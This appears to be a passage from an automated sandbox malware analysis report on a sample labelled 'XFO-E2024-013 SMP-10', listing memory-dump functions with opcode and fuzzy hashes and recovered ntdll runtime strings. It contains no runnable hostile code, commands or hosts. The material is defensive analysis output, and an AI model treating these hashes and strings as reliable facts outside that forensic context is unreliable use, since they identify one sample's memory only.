                                                              • Instruction ID: 13a8364349f292753c87cbadf44b124f66b1697b466f567d32f3fc90a5df3111
                                                              • Opcode Fuzzy Hash: cb74a8bd168d292c57a8b07006dff82433ae2371d072ad0aca43548e28c26d08
                                                              • Instruction Fuzzy Hash: 5090023124180402D149719845086060049A7D0241F95C012A0425554EC7558B56AB61
                                                              Function 011D2DD0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8cebc4e3422bfd9785ac915549600f03668494728c6a6c698ef9f71d1c18e872
                                                              • Instruction ID: 3539b804745fa4828b380eb1ee31de2ff2914e9c91fbc2153d36b7d174d3c8fb
                                                              • Opcode Fuzzy Hash: 8cebc4e3422bfd9785ac915549600f03668494728c6a6c698ef9f71d1c18e872
                                                              • Instruction Fuzzy Hash: F290022124284152554DB19845085074046A7E0241795C012A1415950CC6269956D721
                                                              Function 011D2C60 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bd57ea7ac503e83a05cf2fb7896613ba2c3c28bcf3346be3f3a63ad19290ecac
                                                              • Instruction ID: 1644354527c2ea887d56ada719327e1ba6e66e2b31448df3b3c0ae11bf20690e
                                                              • Opcode Fuzzy Hash: bd57ea7ac503e83a05cf2fb7896613ba2c3c28bcf3346be3f3a63ad19290ecac
                                                              • Instruction Fuzzy Hash: 6390023120180842D10871984508B46004597E0301F55C016A0125654DC715C9517621
                                                              Function 011D2CA0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4b831edad395427ad9f447c347a57a0b5f44cf9f8b52ce1f170e43cbe2abd2c7
                                                              • Instruction ID: fb8fa8607b7b114d80ff6312a96f88366b1198637958024a1720ea19d679869f
                                                              • Opcode Fuzzy Hash: 4b831edad395427ad9f447c347a57a0b5f44cf9f8b52ce1f170e43cbe2abd2c7
                                                              • Instruction Fuzzy Hash: 5090023120180402D10875D8550C646004597E0301F55D011A5025555EC76589916231
                                                              Function 011D2CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3dbafc63ac7908dbac18aee1edb3c48062613201fab858f2b82e198ead9dc4ba
                                                              • Instruction ID: ef0efc1298472ca8f883f781e83270eb39cebe98a4ba87411213d7e787ae7e5c
                                                              • Opcode Fuzzy Hash: 3dbafc63ac7908dbac18aee1edb3c48062613201fab858f2b82e198ead9dc4ba
                                                              • Instruction Fuzzy Hash: F490022160580402D1487198551C706005597D0201F55D011A0025554DC7598B5567A1
                                                              Function 011D2CF0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 39ba1cef4b2b40a763660e2f58daa946dc58ea083317cd03133ee342b53552e6
                                                              • Instruction ID: 7d1e979c6b82f22c3bd9a87914f03a8aa19f7bb5acdeb9d427498a1ab4ee064c
                                                              • Opcode Fuzzy Hash: 39ba1cef4b2b40a763660e2f58daa946dc58ea083317cd03133ee342b53552e6
                                                              • Instruction Fuzzy Hash: 1590023120180403D1087198560C707004597D0201F55D411A0425558DD75689516221
                                                              Function 011D2F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 135c85dfe9b70f0245443b2cc55ae00988dc8f54d350bb375c7ab578b7e475bc
                                                              • Instruction ID: ebe13ae3f57f1dd4ac244fe0d4086b5a1315b29770ada96c886d21bc3cd87fcf
                                                              • Opcode Fuzzy Hash: 135c85dfe9b70f0245443b2cc55ae00988dc8f54d350bb375c7ab578b7e475bc
                                                              • Instruction Fuzzy Hash: 9A90026134180442D10871984518B060045D7E1301F55C015E1065554DC719CD526226
                                                              Function 011D2F60 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ff5e8fabbd5fd853444d616aac9e19d87cb8f4fbc90d8f3ef1051f1a8cbae396
                                                              • Instruction ID: 2b210da731a15f328f80484413f597581099822c4b2d8309df3b1cbd26a30a89
                                                              • Opcode Fuzzy Hash: ff5e8fabbd5fd853444d616aac9e19d87cb8f4fbc90d8f3ef1051f1a8cbae396
                                                              • Instruction Fuzzy Hash: 4390026121180042D10C71984508706008597E1201F55C012A2155554CC6298D615225
                                                              Function 011D2F90 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3f9e3d6f81d8e87356a00c8b90b6bf48d71c18f944059e4856a824cdad353f3c
                                                              • Instruction ID: df67a8cf0d748e57b16b045f2e758f74e251a04ec1c5b8c7d5aaa70907d96ab0
                                                              • Opcode Fuzzy Hash: 3f9e3d6f81d8e87356a00c8b90b6bf48d71c18f944059e4856a824cdad353f3c
                                                              • Instruction Fuzzy Hash: 3A900231201C0402D1087198491870B004597D0302F55C011A1165555DC72589516671
                                                              Function 011D2FB0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: caaa61aa11ca48b157e18b5356ed95207fca8761aeac448bae329ce84177d2c6
                                                              • Instruction ID: 495bb00021864fa2170a1d47b614d92b019b5f801e10afacb14d89e738cdd126
                                                              • Opcode Fuzzy Hash: caaa61aa11ca48b157e18b5356ed95207fca8761aeac448bae329ce84177d2c6
                                                              • Instruction Fuzzy Hash: 1C90022160180042414871A889489064045BBE1211755C121A0999550DC65989655765
                                                              Function 011D2FA0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a5b0c115850fcc7ab22716bbcfc702df2fd6f119083cd70c5a8f63b261f9be47
                                                              • Instruction ID: a1c1f60f33f1ffcf1ca147c604938e10553e69691b652e0dd43be43a344c4b35
                                                              • Opcode Fuzzy Hash: a5b0c115850fcc7ab22716bbcfc702df2fd6f119083cd70c5a8f63b261f9be47
                                                              • Instruction Fuzzy Hash: 91900231201C0402D1087198490C747004597D0302F55C011A5165555EC765C9916631
                                                              Function 011D2FE0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 635633da6835d42addfdb0b611588fec3d3be2ad50c42b39f39a287d3d6dbaaa
                                                              • Instruction ID: 85a4ed8d779833043c9c8dbbfd17bd57b8b849411b727b7293c6bafe2f2c335c
                                                              • Opcode Fuzzy Hash: 635633da6835d42addfdb0b611588fec3d3be2ad50c42b39f39a287d3d6dbaaa
                                                              • Instruction Fuzzy Hash: 3A900221211C0042D20875A84D18B07004597D0303F55C115A0155554CCA1589615621
                                                              Function 011D2E30 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e1ebafc4ffb79dbcfe3c67cdee1c1c1c2485850dd2e0b64395d481fb9d8f2840
                                                              • Instruction ID: c9345e56880e2ac11939d82d9207cf74c65d830a435c559588998d93518d5ca1
                                                              • Opcode Fuzzy Hash: e1ebafc4ffb79dbcfe3c67cdee1c1c1c2485850dd2e0b64395d481fb9d8f2840
                                                              • Instruction Fuzzy Hash: 8F90022130180402D10A719845186060049D7D1345F95C012E1425555DC7258A53A232
                                                              Function 011D2E80 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e3fcc3d393af3360baac1931bb76349aea62b4d561658aa03c7fe62dd662d3eb
                                                              • Instruction ID: 3d0592c3481a0b39de5b9166c5d6c8b69ca76cda62ce66629c4ae0c40ac81088
                                                              • Opcode Fuzzy Hash: e3fcc3d393af3360baac1931bb76349aea62b4d561658aa03c7fe62dd662d3eb
                                                              • Instruction Fuzzy Hash: F590022160180502D10971984508616004A97D0241F95C022A1025555ECB258A92A231
                                                              Function 011D2EA0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fe10594a7233e33bdff4c97b4e6875020f582e4e3fb81d8122ed5b6987177f02
                                                              • Instruction ID: 49a7cd936dc5bffd5e0a863d4b7c7266ec104004ddfa1f907dc4a5a10b515e62
                                                              • Opcode Fuzzy Hash: fe10594a7233e33bdff4c97b4e6875020f582e4e3fb81d8122ed5b6987177f02
                                                              • Instruction Fuzzy Hash: 9190027120180402D14871984508746004597D0301F55C011A5065554EC7598ED56765
                                                              Function 011D2EE0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 69b56bcdd2c224df826671d127929f5b7bb023a2bef71b0d89b1f76d5839aad4
                                                              • Instruction ID: 2fa17b77dca3a21b0314e16ae248f1f940de0bb81323dd31d36a6b920dc5dd34
                                                              • Opcode Fuzzy Hash: 69b56bcdd2c224df826671d127929f5b7bb023a2bef71b0d89b1f76d5839aad4
                                                              • Instruction Fuzzy Hash: 4E900261201C0403D14875984908607004597D0302F55C011A2065555ECB298D516235
                                                              Function 011D3010 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7768a92f985e8ab31119da2fd02284f85ae293103f67c6c9eb55b03e422f70e4
                                                              • Instruction ID: 661337bb53a95790da866ad27387130ee1914db3a90cc29d1584a24e0fca1b13
                                                              • Opcode Fuzzy Hash: 7768a92f985e8ab31119da2fd02284f85ae293103f67c6c9eb55b03e422f70e4
                                                              • Instruction Fuzzy Hash: F8900221201C4442D14872984908B0F414597E1202F95C019A4157554CCA1589555721
                                                              Function 011D3090 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 32f67792c45e568344ae53fa28a4c8cb58de1d6a0f0084757f2473ddf4643546
                                                              • Instruction ID: 0e51cb6c91f3e7c687957de29a57c4589ed19df39121c2dc7c4294a3aff052d1
                                                              • Opcode Fuzzy Hash: 32f67792c45e568344ae53fa28a4c8cb58de1d6a0f0084757f2473ddf4643546
                                                              • Instruction Fuzzy Hash: 2390022124180802D148719885187070046D7D0601F55C011A0025554DC7168A6567B1
                                                              Function 011D39B0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c6e06abbe88d48b3160dcbff5abd0d23b7939f9b15084d7fc8ff6702e44a5142
                                                              • Instruction ID: 840b174dd7e70c7da475d355de3b95eec9c0cfdb234927a3015085a3c1ec46a5
                                                              • Opcode Fuzzy Hash: c6e06abbe88d48b3160dcbff5abd0d23b7939f9b15084d7fc8ff6702e44a5142
                                                              • Instruction Fuzzy Hash: B990022124585102D158719C45086164045B7E0201F55C021A0815594DC65589556321
                                                              Function 011D3D10 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e654023e0a87c7a8db91cf75cc24f089b525c09679e4d730784cf07dc69d6e4e
                                                              • Instruction ID: f3f52c340da2f8fe38eee913aa23c5d82a2a0c871b1ae0ba912d14d354dfee7f
                                                              • Opcode Fuzzy Hash: e654023e0a87c7a8db91cf75cc24f089b525c09679e4d730784cf07dc69d6e4e
                                                              • Instruction Fuzzy Hash: D690023120280142954872985908A4E414597E1302B95D415A0016554CCA1489615321
                                                              Function 011D3D70 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 263791549d93da27451166d3b062480badc8002d0588e0f548dcfbf31daca735
                                                              • Instruction ID: 9511e6606d16312ff0215ddc2d53b3df84c4294d2bfeb7b2231d788eaf95225a
                                                              • Opcode Fuzzy Hash: 263791549d93da27451166d3b062480badc8002d0588e0f548dcfbf31daca735
                                                              • Instruction Fuzzy Hash: 5290023520180402D51871985908646008697D0301F55D411A0425558DC75489A1A221
                                                              Function 011D2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                              • Instruction ID: df6a77655efacd5f1acc58836e85e83301ee2dbd0829a20afb8a85a56cf2fbda
                                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                              • Instruction Fuzzy Hash:
                                                              Function 011D2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: 94376019f74b742032f32074309eb646a4091c92ddbd0708103d488761488450
                                                              • Instruction ID: 3214f6aed0f95f87804900afefd4c8624cb709569b3a4c310fe5932b3b2b5984
                                                              • Opcode Fuzzy Hash: 94376019f74b742032f32074309eb646a4091c92ddbd0708103d488761488450
                                                              • Instruction Fuzzy Hash: BC5109B1A04616BFCB29DB9CC88097EFBF8BB08240754C229F475D3642E375DE1087A0
                                                              Function 01242410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: 3d2921808184de2cef71a897269c65f2c33f343baa1f310e556b7746a04bee35
                                                              • Instruction ID: ff3eba6f562bb52a0ce7c1f5c6387064fdbc62d80f183a3d1d982a7111d51153
                                                              • Opcode Fuzzy Hash: 3d2921808184de2cef71a897269c65f2c33f343baa1f310e556b7746a04bee35
                                                              • Instruction Fuzzy Hash: 8D51F675A20646EFCB2CDF9EE89097FB7F9EF44200B048459F596D7641D7B4DA0087A0
                                                              Function 011C7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 012046FC
                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01204655
                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 01204787
                                                              • ExecuteOptions, xrefs: 012046A0
                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01204742
                                                              • Execute=1, xrefs: 01204713
                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01204725
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                              • API String ID: 0-484625025
                                                              • Opcode ID: 8150c1d58f7f280ec1d6d347d00a9ebd1ed93b475e165948f784f46e3c60eae9
                                                              • Instruction ID: ea023d4ccc343a419d30c5cc3714aa7363749d9870dc9cce7eb152f923b4fc14
                                                              • Opcode Fuzzy Hash: 8150c1d58f7f280ec1d6d347d00a9ebd1ed93b475e165948f784f46e3c60eae9
                                                              • Instruction Fuzzy Hash: 89511A31A002297AEF19EBA9EC89FFD77B8EF24B04F04019DD605A71D1D7B09A458F51
                                                              Function 011DB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-$0$0
                                                              • API String ID: 1302938615-699404926
                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                              • Instruction ID: faa47461a936f8ecb6885477a355d938f03a5135c6cf268c30565b136e196df2
                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                              • Instruction Fuzzy Hash: B0818170E092499FEF2D8E6CC8917FEBBA1AF47360F1B4259D852A72D1C7349840CB59
                                                              Function 012420E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$[$]:%u
                                                              • API String ID: 48624451-2819853543
                                                              • Opcode ID: 54d3e98010e60e96e32ef65daa40785fc5a4a6d9f18523f87b0b2e5af5846091
                                                              • Instruction ID: c81c90d5663f1ddf4204690ae524cc5c77905b97896745a4935b8e81a0fd342f
                                                              • Opcode Fuzzy Hash: 54d3e98010e60e96e32ef65daa40785fc5a4a6d9f18523f87b0b2e5af5846091
                                                              • Instruction Fuzzy Hash: 6D21677AA1011A9BDB14DFB9DC44AEFBBF8EF54644F040115FA15E3201E770DA01CBA1
                                                              Function 011BF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 012002BD
                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 012002E7
                                                              • RTL: Re-Waiting, xrefs: 0120031E
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                              • API String ID: 0-2474120054
                                                              • Opcode ID: ddab7121ba93812e75d619116200f692e0e0a4ef8335c5e54912382f8ae7f5c5
                                                              • Instruction ID: 8ca77989f10630222e4644b659eb6cd641cc6185148695265fbae6e18d34da50
                                                              • Opcode Fuzzy Hash: ddab7121ba93812e75d619116200f692e0e0a4ef8335c5e54912382f8ae7f5c5
                                                              • Instruction Fuzzy Hash: D0E1B1306147429FE72ACF28C884B6ABBE0BF88354F144A5DF6A5CB2D2D774D945CB42
                                                              Function 011CBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01207B7F
                                                              • RTL: Resource at %p, xrefs: 01207B8E
                                                              • RTL: Re-Waiting, xrefs: 01207BAC
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 0-871070163
                                                              • Opcode ID: 3e2930cdc354b2171291f877135b44973b2396dad5b6d35ac366917faff4d582
                                                              • Instruction ID: 2579568898e7e9034a83b34da14edaacbe068f0990ba8260403a190c5f3bb46b
                                                              • Opcode Fuzzy Hash: 3e2930cdc354b2171291f877135b44973b2396dad5b6d35ac366917faff4d582
                                                              • Instruction Fuzzy Hash: 9141E4317057039FD729DE29C841B6AB7E5EFA4B10F000A1DEA9AD7781DB31E4058B96
                                                              Function 011CB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0120728C
                                                              Strings
                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01207294
                                                              • RTL: Resource at %p, xrefs: 012072A3
                                                              • RTL: Re-Waiting, xrefs: 012072C1
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 885266447-605551621
                                                              • Opcode ID: 677b649316090fe2559a2078c894c10ca297a765faf0dfb70402d0505fa320cf
